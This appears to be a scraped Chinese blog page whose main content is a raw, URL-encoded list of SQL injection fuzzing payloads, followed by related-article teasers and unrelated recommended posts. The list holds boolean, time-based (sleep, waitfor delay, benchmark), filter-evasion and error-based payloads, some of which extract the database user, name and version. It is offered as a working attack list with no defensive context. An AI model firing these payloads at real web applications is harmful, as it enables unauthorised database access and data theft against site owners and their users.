\
'
"
%df'
%df"
and%201=1
and%201=2
'%20and%20'1'='1
'%20and%20'1'='2
"%20and%20"1"="1
"%20and%20"1"="2
)%20and%20(1=1
)%20and%20(1=2
')%20and%20('1'='1
')%20and%20('1'='2
%'%20and%201=1%20and%20'%'='
%'%20and%201=2%20and%20'%'='x
%')%20and%201=1%20and%20('%'='
%')%20and%201=2%20and%20('%'='x
OR%201=1
OR%201=2
'%20OR%201=1--%20-
'%20OR%201=2--%20-
)%20OR%201=1--%20-
)%20OR%201=2--%20-
')%20OR%201=1--%20-
')%20OR%201=2--%20-
"%20OR%20"1"="1
"%20OR%20"1"="2
'%20OR%20'1'='1
'%20OR%20'1'='2
)%20OR%20(1=1
)%20OR%20(1=2
')%20OR%20('1'='1
')%20OR%20('1'='2
(case%20when(1=1)%20then%201%20else%20(select%201%20union%20select%202)%20end)
(case%20when(1=2)%20then%201%20else%20(select%201%20union%20select%202)%20end)
,(1-(case%20when(1=1)%20then%201%20else%20(select%201%20union%20select%202)%20end))
,(1-(case%20when(1=2)%20then%201%20else%20(select%201%20union%20select%202)%20end))
,1=if((1=1),1,(select%201%20union%20select%202))
,1=if((1=2),1,(select%201%20union%20select%202))
,If((1=1),1,(select%201%20union%20select%202))--%20-
,If((1=2),1,(select%201%20union%20select%202))--%20-
,If((1=1),sleep(4),(select%201%20union%20select%202))--%20-
-IF((1=1),1,(SELECT%201%20UNION%20SELECT%202))--%20-
-IF((1=2),1,(SELECT%201%20UNION%20SELECT%202))--%20-
-(case%20when(1=1)%20then%201%20else%20(select%201%20union%20select%202)%20end)
-(case%20when(1=2)%20then%201%20else%20(select%201%20union%20select%202)%20end)
'%2b(if((1=1%20and%20sleep(4)),1,(select%201%20union%20select%202)))%2b'a
-IF((1=1),sleep(4),(SELECT%201%20UNION%20SELECT%202))--%20-
';(SELECT%201%20FROM(SELECT(sleep(4)))lWuP)--%20-
;SELECT%20sleep(4)
);SELECT%20sleep(4)--%20-
;SELECT%20sleep(4)--%20-
;(SELECT%201%20FROM(SELECT(sleep(4)))lWuP)--%20-
'%20AND%20SLEEP(4)%23
AND%20sleep(4)
'%20AND%20sleep(4)%20AND%20'1'='1
')%20AND%20sleep(4)%20AND%20('1'='1
)%20AND%20sleep(4)%20AND%20(1=1
"%20AND%20sleep(4)%20AND%20"1"="
')%20and%20(select(0)from(select(sleep(4)))x)--%20-
and%20(select(0)from(select(sleep(4)))x)
and%20(select(0)from(select(sleep(4)))x)%20and%201=1
'%20and%20(select(0)from(select(sleep(4)))x)%20and%20'1'='1
"%20and%20(select(0)from(select(sleep(4)))x)%20and%20"1"="1
)%20and%20(select(0)from(select(sleep(4)))x)%20and%20(1=1
')%20and%20(select(0)from(select(sleep(4)))x)%20and%20('1'='1
rlike%20(select(0)from(select(sleep(4)))x)%20and%201=1
'%20rlike%20(select(0)from(select(sleep(4)))x)%20and%20'1'='1
)%20rlike%20(select(0)from(select(sleep(4)))x)%20and%20(1=1
')%20rlike%20(select(0)from(select(sleep(4)))x)%20and%20('1'='1
;waitfor%20delay%20'0:0:4'%20--%20-
';waitfor%20delay%20'0:0:4'%20--%20-
);waitfor%20delay%20'0:0:4'%20--%20-
');waitfor%20delay%20'0:0:4'%20--%20-
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/
(SELECT%20*%20FROM(SELECT(sleep(4)))lWuP)
procedure%20analyse(extractvalue(1,if(1=1,benchmark(5000000,md5(1)),2)),1)
xor%201=2
xor%202=2
%2527%20%20%20%20%20%20%20
%0A%09UNION%0CSELECT%A0NULL%20%23
UNION%20SELECT%20/*!50000%205,null;%00*//*!40000%204,null--%20,*//*!30000%203,null--%20x*/0,null--+
''%20or%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(user(),0x7c,database(),0x7c,version())),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)k)%23
''%20or%20updatexml(1,concat(0x7e,(database())),0)%20

盲注fuzz的更多相关文章

  1. mysql基于“时间”的盲注

    无需页面报错,根据页面响应时间做判断! mysql基于时间的盲注 =================================================================== ...

  2. SQL盲注之正则攻击

    我们都已经知道,在MYSQL 5+中 information_schema库中存储了所有的 库名,表明以及字段名信息.故攻击方式如下: 1. 判断第一个表名的第一个字符是否是a-z中的字符,其中bli ...

  3. sql 盲注之正则表达式攻击

    -----------------------------------------MYSQL 5+----------------------------------------- 我们都已经知道,在 ...

  4. 小白日记42:kali渗透测试之Web渗透-SQL盲注

    SQL盲注 [SQL注入介绍] SQL盲注:不显示数据库内建的报错信息[内建的报错信息帮助开发人员发现和修复问题],但由于报错信息中提供了关于系统的大量有用信息.当程序员隐藏了数据库内建报错信息,替换 ...

  5. UPdate 延时盲注之小技巧

    Title:UPdate 延时盲注之小技巧  --2014-06-05 15:21 UPDATE TABLEZZZ SET zz=111111 where id=$id 当TABLEZZZ表为空的时候 ...

  6. WEB安全实战(一)SQL盲注

    前言 好长时间没有写过东西了,不是不想写,仅仅只是是一直静不下心来写点东西.当然,拖了这么长的时间,也总该写点什么的.近期刚刚上手安全方面的东西,作为一个菜鸟,也本着学习的目的,就谈谈近期接触到的安全 ...

  7. zzcms8.2#任意用户密码重置#del.php时间盲注#复现

    00x0 引言 早上起来,发现seebug更新了一批新的洞, 发现zzcms8.2这个洞好多人在挖,于是我就默默的踏上了复现之路(要不是点进去要买详情,我何必这么折腾~) 环境:zzcms8.2(产品 ...

  8. 实验吧_who are you?(盲注)

    who are you? 翻翻源码,抓抓包,乱试一通都没有什么结果 题目中提示有ip,立马应该联想到X-Forwarded-For 虽然知道是这个方面的题,但完全不知道从何入手,悄咪咪去翻一下wp 才 ...

  9. Python:SQLMap源码精读—基于时间的盲注(time-based blind)

    建议阅读 Time-Based Blind SQL Injection Attacks 基于时间的盲注(time-based blind) 测试应用是否存在SQL注入漏洞时,经常发现某一潜在的漏洞难以 ...

随机推荐

  1. C#集合类型——Hashtable、Dictionary之浅谈

    Hashtable表 数组.数组集合.List集合都是通过索引来访问里面成员.哈希表则是通过键来访问成员值.键不可为空,值可为空. 比如: Hashtable  hash=new  Hashtable ...

  2. Java中基础类基础方法(学生类)(手机类)

    学生类: //这是我的学生类class Student { //定义变量 //姓名 String name; //null //年龄 int age; //0 //地址 String address; ...

  3. 负载均衡服务之HAProxy基础配置(三)

    前文我们聊到了haproxy的代理配置段中比较常用的配置指令的用法以及说明,回顾请参考https://www.cnblogs.com/qiuhom-1874/p/12770930.html:今天我们来 ...

  4. 二分查找(通过相对位置判断区间位置)--17--二分--LeetCode33搜索旋转排序数组

    搜索旋转排序数组 假设按照升序排序的数组在预先未知的某个点上进行了旋转.( 例如,数组 [0,1,2,4,5,6,7] 可能变为 [4,5,6,7,0,1,2] ). 搜索一个给定的目标值,如果数组中 ...

  5. php环境兼容性问题---压缩格式及其配置简介

    php环境兼容性问题-- 内容编码错误 无法显示您尝试查看的页面,因为它使用了无效或者不支持的压缩格式. 请联系网站的所有者以告知此问题. 以前也遇到过同样的问题,记得是PHP代码ob_start(' ...

  6. 透彻理解C++11新特性:右值引用、std::move、std::forward

    目录 浅拷贝.深拷贝 左值.右值 右值引用类型 强转右值 std::move 重新审视右值引用 右值引用类型和右值的关系 函数参数传递 函数返还值传递 万能引用 引用折叠 完美转发 std::forw ...

  7. 运行node 报错 throw er; // Unhandled 'error' event

    错误提示 此端口已被占用,改换其他端口

  8. PostgreSQL 10.0 preview 性能增强 - 分区表性能增强(plan阶段加速)

    标签 PostgreSQL , 10.0 , 分区表 , 子表 , 元信息搜索性能增强 背景 PostgreSQL 10.0 增强了分区表的子表搜索性能,对于涉及分区表包含子表特别多的QUERY,可以 ...

  9. Clickhouse 时区转换

    Clickhouse 时区转换 ClickHouse是一个用于联机分析(OLAP)的列式数据库管理系统(DBMS). OLAP场景的关键特征 大多数是读请求 数据总是以相当大的批(> 1000 ...

  10. H5 -- 取消a标签在点击时的背景颜色

    原文链接:点我 1.取消a标签在移动端点击时的蓝色 a { -webkit-tap-highlight-color: rgba(255, 255, 255, 0); -webkit-user-sele ...